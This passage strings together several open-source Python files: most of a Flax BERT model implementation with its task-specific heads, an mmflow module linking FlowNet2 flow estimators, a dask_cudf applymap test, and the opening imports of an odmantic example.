head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
class FlaxBertPooler(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
def setup(self):
self.dense = nn.Dense(
self.config.hidden_size,
kernel_init=jax.nn.initializers.normal(self.config.initializer_range),
dtype=self.dtype,
)
def __call__(self, hidden_states):
cls_hidden_state = hidden_states[:, 0]
cls_hidden_state = self.dense(cls_hidden_state)
return nn.tanh(cls_hidden_state)
class FlaxBertPredictionHeadTransform(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.dense = nn.Dense(self.config.hidden_size, dtype=self.dtype)
self.activation = ACT2FN[self.config.hidden_act]
self.LayerNorm = nn.LayerNorm(epsilon=self.config.layer_norm_eps, dtype=self.dtype)
def __call__(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.activation(hidden_states)
return self.LayerNorm(hidden_states)
class FlaxBertLMPredictionHead(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
bias_init: Callable[..., np.ndarray] = jax.nn.initializers.zeros
def setup(self):
self.transform = FlaxBertPredictionHeadTransform(self.config, dtype=self.dtype)
self.decoder = nn.Dense(self.config.vocab_size, dtype=self.dtype, use_bias=False)
self.bias = self.param("bias", self.bias_init, (self.config.vocab_size,))
def __call__(self, hidden_states, shared_embedding=None):
hidden_states = self.transform(hidden_states)
if shared_embedding is not None:
hidden_states = self.decoder.apply({"params": {"kernel": shared_embedding.T}}, hidden_states)
else:
hidden_states = self.decoder(hidden_states)
bias = jnp.asarray(self.bias, self.dtype)
hidden_states += bias
return hidden_states
class FlaxBertOnlyMLMHead(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.predictions = FlaxBertLMPredictionHead(self.config, dtype=self.dtype)
def __call__(self, hidden_states, shared_embedding=None):
hidden_states = self.predictions(hidden_states, shared_embedding=shared_embedding)
return hidden_states
class FlaxBertOnlyNSPHead(nn.Module):
dtype: jnp.dtype = jnp.float32
def setup(self):
self.seq_relationship = nn.Dense(2, dtype=self.dtype)
def __call__(self, pooled_output):
return self.seq_relationship(pooled_output)
class FlaxBertPreTrainingHeads(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.predictions = FlaxBertLMPredictionHead(self.config, dtype=self.dtype)
self.seq_relationship = nn.Dense(2, dtype=self.dtype)
def __call__(self, hidden_states, pooled_output, shared_embedding=None):
prediction_scores = self.predictions(hidden_states, shared_embedding=shared_embedding)
seq_relationship_score = self.seq_relationship(pooled_output)
return prediction_scores, seq_relationship_score
class FlaxBertPreTrainedModel(FlaxPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = BertConfig
base_model_prefix = "bert"
module_class: nn.Module = None
def __init__(
self,
config: BertConfig,
input_shape: Tuple = (1, 1),
seed: int = 0,
dtype: jnp.dtype = jnp.float32,
_do_init: bool = True,
**kwargs
):
module = self.module_class(config=config, dtype=dtype, **kwargs)
super().__init__(config, module, input_shape=input_shape, seed=seed, dtype=dtype, _do_init=_do_init)
def init_weights(self, rng: jax.random.PRNGKey, input_shape: Tuple, params: FrozenDict = None) -> FrozenDict:
# init input tensors
input_ids = jnp.zeros(input_shape, dtype="i4")
token_type_ids = jnp.zeros_like(input_ids)
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_shape)
attention_mask = jnp.ones_like(input_ids)
head_mask = jnp.ones((self.config.num_hidden_layers, self.config.num_attention_heads))
params_rng, dropout_rng = jax.random.split(rng)
rngs = {"params": params_rng, "dropout": dropout_rng}
if self.config.add_cross_attention:
encoder_hidden_states = jnp.zeros(input_shape + (self.config.hidden_size,))
encoder_attention_mask = attention_mask
module_init_outputs = self.module.init(
rngs,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
return_dict=False,
)
else:
module_init_outputs = self.module.init(
rngs, input_ids, attention_mask, token_type_ids, position_ids, head_mask, return_dict=False
)
random_params = module_init_outputs["params"]
if params is not None:
random_params = flatten_dict(unfreeze(random_params))
params = flatten_dict(unfreeze(params))
for missing_key in self._missing_keys:
params[missing_key] = random_params[missing_key]
self._missing_keys = set()
return freeze(unflatten_dict(params))
else:
return random_params
# Copied from transformers.models.bart.modeling_flax_bart.FlaxBartDecoderPreTrainedModel.init_cache
def init_cache(self, batch_size, max_length):
r"""
Args:
batch_size (`int`):
batch_size used for fast auto-regressive decoding. Defines the batch size of the initialized cache.
max_length (`int`):
maximum possible length for auto-regressive decoding. Defines the sequence length of the initialized
cache.
"""
# init input variables to retrieve cache
input_ids = jnp.ones((batch_size, max_length), dtype="i4")
attention_mask = jnp.ones_like(input_ids, dtype="i4")
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape)
init_variables = self.module.init(
jax.random.PRNGKey(0), input_ids, attention_mask, position_ids, return_dict=False, init_cache=True
)
return unfreeze(init_variables["cache"])
@add_start_docstrings_to_model_forward(BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
def __call__(
self,
input_ids,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
params: dict = None,
dropout_rng: jax.random.PRNGKey = None,
train: bool = False,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
past_key_values: dict = None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.return_dict
# init input tensors if not passed
if token_type_ids is None:
token_type_ids = jnp.zeros_like(input_ids)
if position_ids is None:
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape)
if attention_mask is None:
attention_mask = jnp.ones_like(input_ids)
if head_mask is None:
head_mask = jnp.ones((self.config.num_hidden_layers, self.config.num_attention_heads))
# Handle any PRNG if needed
rngs = {}
if dropout_rng is not None:
rngs["dropout"] = dropout_rng
inputs = {"params": params or self.params}
if self.config.add_cross_attention:
# if past_key_values are passed then cache is already initialized a private flag init_cache has to be passed
# down to ensure cache is used. It has to be made sure that cache is marked as mutable so that it can be
# changed by FlaxBertAttention module
if past_key_values:
inputs["cache"] = past_key_values
mutable = ["cache"]
else:
mutable = False
outputs = self.module.apply(
inputs,
jnp.array(input_ids, dtype="i4"),
jnp.array(attention_mask, dtype="i4"),
token_type_ids=jnp.array(token_type_ids, dtype="i4"),
position_ids=jnp.array(position_ids, dtype="i4"),
head_mask=jnp.array(head_mask, dtype="i4"),
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
deterministic=not train,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
rngs=rngs,
mutable=mutable,
)
# add updated cache to model output
if past_key_values is not None and return_dict:
outputs, past_key_values = outputs
outputs["past_key_values"] = unfreeze(past_key_values["cache"])
return outputs
elif past_key_values is not None and not return_dict:
outputs, past_key_values = outputs
outputs = outputs[:1] + (unfreeze(past_key_values["cache"]),) + outputs[1:]
else:
outputs = self.module.apply(
inputs,
jnp.array(input_ids, dtype="i4"),
jnp.array(attention_mask, dtype="i4"),
token_type_ids=jnp.array(token_type_ids, dtype="i4"),
position_ids=jnp.array(position_ids, dtype="i4"),
head_mask=jnp.array(head_mask, dtype="i4"),
deterministic=not train,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
rngs=rngs,
)
return outputs
class FlaxBertModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32 # the dtype of the computation
add_pooling_layer: bool = True
def setup(self):
self.embeddings = FlaxBertEmbeddings(self.config, dtype=self.dtype)
self.encoder = FlaxBertEncoder(self.config, dtype=self.dtype)
self.pooler = FlaxBertPooler(self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids: Optional[jnp.ndarray] = None,
position_ids: Optional[jnp.ndarray] = None,
head_mask: Optional[jnp.ndarray] = None,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# make sure `token_type_ids` is correctly initialized when not passed
if token_type_ids is None:
token_type_ids = jnp.zeros_like(input_ids)
# make sure `position_ids` is correctly initialized when not passed
if position_ids is None:
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape)
hidden_states = self.embeddings(
input_ids, token_type_ids, position_ids, attention_mask, deterministic=deterministic
)
outputs = self.encoder(
hidden_states,
attention_mask,
head_mask=head_mask,
deterministic=deterministic,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
pooled = self.pooler(hidden_states) if self.add_pooling_layer else None
if not return_dict:
# if pooled is None, don't return it
if pooled is None:
return (hidden_states,) + outputs[1:]
return (hidden_states, pooled) + outputs[1:]
return FlaxBaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=hidden_states,
pooler_output=pooled,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
@add_start_docstrings(
"The bare Bert Model transformer outputting raw hidden-states without any specific head on top.",
BERT_START_DOCSTRING,
)
class FlaxBertModel(FlaxBertPreTrainedModel):
module_class = FlaxBertModule
append_call_sample_docstring(
FlaxBertModel, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxBaseModelOutputWithPooling, _CONFIG_FOR_DOC
)
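# Brief usage sketch (added commentary; mirrors the sample docstring generated above):
#
#   from transformers import BertTokenizer, FlaxBertModel
#
#   tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
#   model = FlaxBertModel.from_pretrained("bert-base-uncased")
#   inputs = tokenizer("Hello, my dog is cute", return_tensors="np")
#   last_hidden_state = model(**inputs).last_hidden_state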
class FlaxBertForPreTrainingModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
self.cls = FlaxBertPreTrainingHeads(config=self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if self.config.tie_word_embeddings:
shared_embedding = self.bert.variables["params"]["embeddings"]["word_embeddings"]["embedding"]
else:
shared_embedding = None
hidden_states = outputs[0]
pooled_output = outputs[1]
prediction_scores, seq_relationship_score = self.cls(
hidden_states, pooled_output, shared_embedding=shared_embedding
)
if not return_dict:
return (prediction_scores, seq_relationship_score) + outputs[2:]
return FlaxBertForPreTrainingOutput(
prediction_logits=prediction_scores,
seq_relationship_logits=seq_relationship_score,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with two heads on top as done during the pretraining: a `masked language modeling` head and a `next
sentence prediction (classification)` head.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForPreTraining(FlaxBertPreTrainedModel):
module_class = FlaxBertForPreTrainingModule
FLAX_BERT_FOR_PRETRAINING_DOCSTRING = """
Returns:
Example:
```python
>>> from transformers import BertTokenizer, FlaxBertForPreTraining
>>> tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
>>> model = FlaxBertForPreTraining.from_pretrained("bert-base-uncased")
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="np")
>>> outputs = model(**inputs)
>>> prediction_logits = outputs.prediction_logits
>>> seq_relationship_logits = outputs.seq_relationship_logits
```
"""
overwrite_call_docstring(
FlaxBertForPreTraining,
BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length") + FLAX_BERT_FOR_PRETRAINING_DOCSTRING,
)
append_replace_return_docstrings(
FlaxBertForPreTraining, output_type=FlaxBertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC
)
class FlaxBertForMaskedLMModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, add_pooling_layer=False, dtype=self.dtype)
self.cls = FlaxBertOnlyMLMHead(config=self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
if self.config.tie_word_embeddings:
shared_embedding = self.bert.variables["params"]["embeddings"]["word_embeddings"]["embedding"]
else:
shared_embedding = None
# Compute the prediction scores
logits = self.cls(hidden_states, shared_embedding=shared_embedding)
if not return_dict:
return (logits,) + outputs[1:]
return FlaxMaskedLMOutput(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings("""Bert Model with a `language modeling` head on top.""", BERT_START_DOCSTRING)
class FlaxBertForMaskedLM(FlaxBertPreTrainedModel):
module_class = FlaxBertForMaskedLMModule
append_call_sample_docstring(
FlaxBertForMaskedLM, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxMaskedLMOutput, _CONFIG_FOR_DOC
)
class FlaxBertForNextSentencePredictionModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
self.cls = FlaxBertOnlyNSPHead(dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
return_dict = return_dict if return_dict is not None else self.config.return_dict
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
seq_relationship_scores = self.cls(pooled_output)
if not return_dict:
return (seq_relationship_scores,) + outputs[2:]
return FlaxNextSentencePredictorOutput(
logits=seq_relationship_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""Bert Model with a `next sentence prediction (classification)` head on top.""",
BERT_START_DOCSTRING,
)
class FlaxBertForNextSentencePrediction(FlaxBertPreTrainedModel):
module_class = FlaxBertForNextSentencePredictionModule
FLAX_BERT_FOR_NEXT_SENT_PRED_DOCSTRING = """
Returns:
Example:
```python
>>> from transformers import BertTokenizer, FlaxBertForNextSentencePrediction
>>> tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
>>> model = FlaxBertForNextSentencePrediction.from_pretrained("bert-base-uncased")
>>> prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
>>> next_sentence = "The sky is blue due to the shorter wavelength of blue light."
>>> encoding = tokenizer(prompt, next_sentence, return_tensors="jax")
>>> outputs = model(**encoding)
>>> logits = outputs.logits
>>> assert logits[0, 0] < logits[0, 1] # next sentence was random
```
"""
overwrite_call_docstring(
FlaxBertForNextSentencePrediction,
BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length") + FLAX_BERT_FOR_NEXT_SENT_PRED_DOCSTRING,
)
append_replace_return_docstrings(
FlaxBertForNextSentencePrediction, output_type=FlaxNextSentencePredictorOutput, config_class=_CONFIG_FOR_DOC
)
class FlaxBertForSequenceClassificationModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
classifier_dropout = (
self.config.classifier_dropout
if self.config.classifier_dropout is not None
else self.config.hidden_dropout_prob
)
self.dropout = nn.Dropout(rate=classifier_dropout)
self.classifier = nn.Dense(
self.config.num_labels,
dtype=self.dtype,
)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output, deterministic=deterministic)
logits = self.classifier(pooled_output)
if not return_dict:
return (logits,) + outputs[2:]
return FlaxSequenceClassifierOutput(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled
output) e.g. for GLUE tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForSequenceClassification(FlaxBertPreTrainedModel):
module_class = FlaxBertForSequenceClassificationModule
append_call_sample_docstring(
FlaxBertForSequenceClassification,
_TOKENIZER_FOR_DOC,
_CHECKPOINT_FOR_DOC,
FlaxSequenceClassifierOutput,
_CONFIG_FOR_DOC,
)
class FlaxBertForMultipleChoiceModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
self.classifier = nn.Dense(1, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
num_choices = input_ids.shape[1]
input_ids = input_ids.reshape(-1, input_ids.shape[-1]) if input_ids is not None else None
attention_mask = attention_mask.reshape(-1, attention_mask.shape[-1]) if attention_mask is not None else None
token_type_ids = token_type_ids.reshape(-1, token_type_ids.shape[-1]) if token_type_ids is not None else None
position_ids = position_ids.reshape(-1, position_ids.shape[-1]) if position_ids is not None else None
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output, deterministic=deterministic)
logits = self.classifier(pooled_output)
reshaped_logits = logits.reshape(-1, num_choices)
if not return_dict:
return (reshaped_logits,) + outputs[2:]
return FlaxMultipleChoiceModelOutput(
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForMultipleChoice(FlaxBertPreTrainedModel):
module_class = FlaxBertForMultipleChoiceModule
overwrite_call_docstring(
FlaxBertForMultipleChoice, BERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
)
append_call_sample_docstring(
FlaxBertForMultipleChoice, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxMultipleChoiceModelOutput, _CONFIG_FOR_DOC
)
class FlaxBertForTokenClassificationModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype, add_pooling_layer=False)
classifier_dropout = (
self.config.classifier_dropout
if self.config.classifier_dropout is not None
else self.config.hidden_dropout_prob
)
self.dropout = nn.Dropout(rate=classifier_dropout)
self.classifier = nn.Dense(self.config.num_labels, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
logits = self.classifier(hidden_states)
if not return_dict:
return (logits,) + outputs[1:]
return FlaxTokenClassifierOutput(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForTokenClassification(FlaxBertPreTrainedModel):
module_class = FlaxBertForTokenClassificationModule
append_call_sample_docstring(
FlaxBertForTokenClassification, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxTokenClassifierOutput, _CONFIG_FOR_DOC
)
class FlaxBertForQuestionAnsweringModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype, add_pooling_layer=False)
self.qa_outputs = nn.Dense(self.config.num_labels, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
logits = self.qa_outputs(hidden_states)
start_logits, end_logits = logits.split(self.config.num_labels, axis=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
if not return_dict:
return (start_logits, end_logits) + outputs[1:]
return FlaxQuestionAnsweringModelOutput(
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
BERT_START_DOCSTRING,
)
class FlaxBertForQuestionAnswering(FlaxBertPreTrainedModel):
module_class = FlaxBertForQuestionAnsweringModule
append_call_sample_docstring(
FlaxBertForQuestionAnswering,
_TOKENIZER_FOR_DOC,
_CHECKPOINT_FOR_DOC,
FlaxQuestionAnsweringModelOutput,
_CONFIG_FOR_DOC,
)
class FlaxBertForCausalLMModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, add_pooling_layer=False, dtype=self.dtype)
self.cls = FlaxBertOnlyMLMHead(config=self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
position_ids,
token_type_ids: Optional[jnp.ndarray] = None,
head_mask: Optional[jnp.ndarray] = None,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
if self.config.tie_word_embeddings:
shared_embedding = self.bert.variables["params"]["embeddings"]["word_embeddings"]["embedding"]
else:
shared_embedding = None
# Compute the prediction scores
logits = self.cls(hidden_states, shared_embedding=shared_embedding)
if not return_dict:
return (logits,) + outputs[1:]
return FlaxCausalLMOutputWithCrossAttentions(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
@add_start_docstrings(
"""
Bert Model with a language modeling head on top (a linear layer on top of the hidden-states output) e.g for
autoregressive tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForCausalLM(FlaxBertPreTrainedModel):
module_class = FlaxBertForCausalLMModule
def prepare_inputs_for_generation(self, input_ids, max_length, attention_mask: Optional[jnp.DeviceArray] = None):
# initializing the cache
batch_size, seq_length = input_ids.shape
past_key_values = self.init_cache(batch_size, max_length)
# Note that usually one would have to put 0's in the attention_mask for x > input_ids.shape[-1] and x < cache_length.
# But since the decoder uses a causal mask, those positions are masked anyway.
# Thus, we can create a single static attention_mask here, which is more efficient for compilation
extended_attention_mask = jnp.ones((batch_size, max_length), dtype="i4")
if attention_mask is not None:
position_ids = attention_mask.cumsum(axis=-1) - 1
extended_attention_mask = lax.dynamic_update_slice(extended_attention_mask, attention_mask, (0, 0))
else:
position_ids = jnp.broadcast_to(jnp.arange(seq_length, dtype="i4")[None, :], (batch_size, seq_length))
return {
"past_key_values": past_key_values,
"attention_mask": extended_attention_mask,
"position_ids": position_ids,
}
def update_inputs_for_generation(self, model_outputs, model_kwargs):
model_kwargs["past_key_values"] = model_outputs.past_key_values
model_kwargs["position_ids"] = model_kwargs["position_ids"][:, -1:] + 1
return model_kwargs
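# --- Usage sketch (not part of the original file) ---
# Greedy generation with the causal head defined above; the checkpoint name
# and the is_decoder flag are assumptions used for illustration only.
# >>> from transformers import BertTokenizer, FlaxBertForCausalLM
# >>> tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
# >>> model = FlaxBertForCausalLM.from_pretrained("bert-base-uncased", is_decoder=True)
# >>> input_ids = tokenizer("Hello", return_tensors="np").input_ids
# >>> generated = model.generate(input_ids, max_length=20).sequences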
append_call_sample_docstring(
FlaxBertForCausalLM,
_TOKENIZER_FOR_DOC,
_CHECKPOINT_FOR_DOC,
FlaxCausalLMOutputWithCrossAttentions,
_CONFIG_FOR_DOC,
)
|
mmflow/models/utils/estimators_link.py
|
hologerry/mmflow
| 481 |
103051
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
from torch import Tensor
from mmflow.ops import build_operators
class LinkOutput:
"""The link output between two estimators in FlowNet2."""
def __init__(self) -> None:
self.upsample_flow = None
self.scaled_flow = None
self.norm_scaled_flow = None
self.warped_img2 = None
self.diff = None
self.brightness_err = None
class BasicLink(nn.Module):
"""Connect two separate flow estimators.
BasicLink computes the following values: the upsampled flow prediction, the
scaled flow prediction and its L2 norm, the warped second image, the difference
between the first image and the warped image, and the brightness error.
Args:
scale_factor (int): Scale factor of upsampling. Defaults to 4.
mode (str): Algorithm used for upsampling: 'nearest', 'linear',
'bilinear', 'bicubic', 'trilinear' or 'area'. Defaults to 'bilinear'.
warp_cfg (dict): Config for the warp operator. Defaults to
dict(type='Warp', padding_mode='border', align_corners=True).
"""
def __init__(self,
scale_factor: int = 4,
mode: str = 'bilinear',
warp_cfg: dict = dict(
type='Warp', padding_mode='border', align_corners=True)):
super(BasicLink, self).__init__()
self.warp = build_operators(warp_cfg)
self.upSample = nn.Upsample(scale_factor=scale_factor, mode=mode)
def __call__(self, img1: Tensor, img2: Tensor, flow: Tensor,
flow_div: float) -> LinkOutput:
"""Call function for BasicLink.
Args:
img1 (Tensor): The first input image.
img2 (Tensor): The second input image.
flow (Tensor): The estimated optical flow from the first image to
the second image.
flow_div (float): The divisor for scaling the value of optical
flow.
Returns:
LinkOutput: The output for the next flow estimator.
"""
upsample_flow = self.upSample(flow)
scaled_flow = upsample_flow * flow_div  # reuse the upsampled flow instead of recomputing it
norm_scaled_flow = torch.norm(scaled_flow, p=2, dim=1, keepdim=True)
warped_img2 = self.warp(img2, scaled_flow)
diff = img1 - warped_img2
bright_err = torch.norm(diff, p=2, dim=1, keepdim=True)
output = LinkOutput()
output.upsample_flow = upsample_flow
output.scaled_flow = scaled_flow
output.norm_scaled_flow = norm_scaled_flow
output.warped_img2 = warped_img2
output.diff = diff
output.brightness_err = bright_err
return output
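# --- Usage sketch (not part of the original module) ---
# Shows how BasicLink sits between two estimators in FlowNet2; the tensor
# shapes and flow_div value are assumptions used for illustration only.
if __name__ == '__main__':
    imgs1 = torch.randn(2, 3, 64, 64)
    imgs2 = torch.randn(2, 3, 64, 64)
    flow = torch.randn(2, 2, 16, 16)  # coarse flow at 1/4 resolution
    link = BasicLink(scale_factor=4)
    out = link(imgs1, imgs2, flow, flow_div=20.)
    # These outputs are concatenated to build the input of the next estimator.
    print(out.scaled_flow.shape, out.brightness_err.shape)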
|
python/dask_cudf/dask_cudf/tests/test_applymap.py
|
Ahsantw/cudf
| 239 |
103056
|
# Copyright (c) 2022, NVIDIA CORPORATION.
import pytest
from pandas import NA
from dask import dataframe as dd
from dask_cudf.tests.utils import _make_random_frame
@pytest.mark.parametrize(
"func",
[
lambda x: x + 1,
lambda x: x - 0.5,
lambda x: 2 if x is NA else 2 + (x + 1) / 4.1,
lambda x: 42,
],
)
@pytest.mark.parametrize("has_na", [True, False])
def test_applymap_basic(func, has_na):
size = 2000
pdf, dgdf = _make_random_frame(size, include_na=has_na)
dpdf = dd.from_pandas(pdf, npartitions=dgdf.npartitions)
expect = dpdf.applymap(func)
got = dgdf.applymap(func)
dd.assert_eq(expect, got, check_dtype=False)
|
docs/examples_src/raw_query_usage/parse_with_unset_default.py
|
dynalz/odmantic
| 486 |
103066
|
from bson import ObjectId
from odmantic import Model
